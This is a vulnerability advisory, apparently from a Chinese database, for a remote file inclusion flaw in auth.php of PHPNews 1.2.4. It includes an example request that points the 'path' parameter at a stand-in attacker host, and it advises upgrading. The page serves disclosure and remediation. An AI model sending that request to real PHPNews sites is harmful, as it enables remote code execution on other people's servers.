发布时间 :2005-03-01 00:00:00
修订时间 :2016-10-17 23:13:20

[原文]PHP remote file inclusion vulnerability in auth.php in PHPNews 1.2.4 and possibly 1.2.3, allows remote attackers to execute arbitrary PHP code via the path parameter.

[CNNVD]PHPNews 'auth.php' 远程文件包含漏洞(CNNVD-200503-021)

        PHPNews 1.2.4及可能的1.2.3的auth.php中存在PHP远程文件包含漏洞,远程攻击者可以通过path参数执行任意PHP代码。

- 漏洞信息

PHPNews 'auth.php' 远程文件包含漏洞
中危 输入验证
2005-03-01 00:00:00 2005-10-20 00:00:00
PHPNews auth.php path Parameter Remote File Inclusion
PHPNews contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due 'auth.php' not properly sanitizing user input supplied to the 'path' parameter. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

2005-03-01 Unknow
2005-03-03 Unknow

Upgrade to version 1.2.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

PHPNews Auth.PHP Remote File Include Vulnerability
Discovery of this vulnerability is credited to Filip Groszynski <>.

PHPNews PHPNews 1.2.4
PHPNews PHPNews 1.2.3

It is reported that PHPNews is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input.

This issue reportedly affects PHPNews version 1.2.4, previous versions might also be affected.

The following examples are available:[dir]/auth.php?path=http://[hacker_box]/

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: <>.

